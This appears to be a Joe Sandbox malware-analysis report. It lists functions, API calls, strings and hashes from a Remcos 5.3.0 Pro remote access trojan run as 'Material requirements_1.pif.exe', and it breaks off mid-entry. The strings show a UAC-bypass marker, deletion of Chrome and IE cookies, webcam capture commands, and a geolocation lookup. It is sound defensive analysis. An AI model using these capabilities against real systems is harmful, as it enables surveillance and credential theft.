                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                        • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                        • Opcode Fuzzy Hash: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
                        • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                        Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                        • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                        • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                        • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                        Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • _free.LIBCMT ref: 00444096
                        • _free.LIBCMT ref: 004440AD
                        • _free.LIBCMT ref: 004440CC
                        • _free.LIBCMT ref: 004440E7
                        • _free.LIBCMT ref: 004440FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID: Z7D
                        • API String ID: 3033488037-2145146825
                        • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                        • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                        • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                        • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                        Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                        • __fassign.LIBCMT ref: 0044A190
                        • __fassign.LIBCMT ref: 0044A1AB
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                        • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                        • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                        • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                        Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                        Download Yara Rule
                        APIs
                        • ExitThread.KERNEL32 ref: 004017F4
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • __Init_thread_footer.LIBCMT ref: 004017BC
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: T=G$>G$>G
                        • API String ID: 1596592924-1617985637
                        • Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                        • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                        • Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                        • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                        Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumInfoOpenQuerysend
                        • String ID: TUFTUF$>G$DG$DG
                        • API String ID: 3114080316-344394840
                        • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                        • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                        • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                        • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                        Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                        • _ValidateLocalCookies.LIBCMT ref: 00437B51
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                        • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                        • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                        • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                        Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                          • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                          • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                        • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                        • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                        • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                        Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                        • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                        • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                        • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                        Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                        • int.LIBCPMT ref: 0040FC0F
                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: p[G
                        • API String ID: 2536120697-440918510
                        • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                        • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                        • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                        • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                        Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 0041A55E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                        • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                        • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                        • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                        Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                        • _free.LIBCMT ref: 0044FD39
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 0044FD44
                        • _free.LIBCMT ref: 0044FD4F
                        • _free.LIBCMT ref: 0044FDA3
                        • _free.LIBCMT ref: 0044FDAE
                        • _free.LIBCMT ref: 0044FDB9
                        • _free.LIBCMT ref: 0044FDC4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                        • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                        • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                        Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe), ref: 00406835
                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                        • CoUninitialize.OLE32 ref: 0040688E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InitializeObjectUninitialize_wcslen
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                        • API String ID: 3851391207-1996810057
                        • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                        • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                        Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                        • int.LIBCPMT ref: 0040FEF2
                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: h]G
                        • API String ID: 2536120697-1579725984
                        • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                        • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                        • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                        • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                        Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                        • GetLastError.KERNEL32 ref: 0040B2EE
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                        • UserProfile, xrefs: 0040B2B4
                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                        • [Chrome Cookies not found], xrefs: 0040B308
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                        • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                        • Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                        • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                        Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                        • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AllocOutputShowWindow
                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                        • API String ID: 2425139147-2527699604
                        • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                        • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                        • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                        • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                        Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (CG$C:\Users\user\Desktop\Material requirements_1.pif.exe$BG
                        • API String ID: 0-3108968625
                        • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                        • Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                        Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        • __allrem.LIBCMT ref: 00439799
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                        • __allrem.LIBCMT ref: 004397CC
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                        • __allrem.LIBCMT ref: 00439801
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                        • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                        • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                        • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                        Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
                        • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                        • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                        • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                        • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                        Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                        • API String ID: 3469354165-462540288
                        • Opcode ID: b8e9e228615381c613a5fe4a24ae204d60489973bad034a9f17b21e91d3d6061
                        • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                        • Opcode Fuzzy Hash: b8e9e228615381c613a5fe4a24ae204d60489973bad034a9f17b21e91d3d6061
                        • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                        Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                        • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                        • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                        • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                        Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                        • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
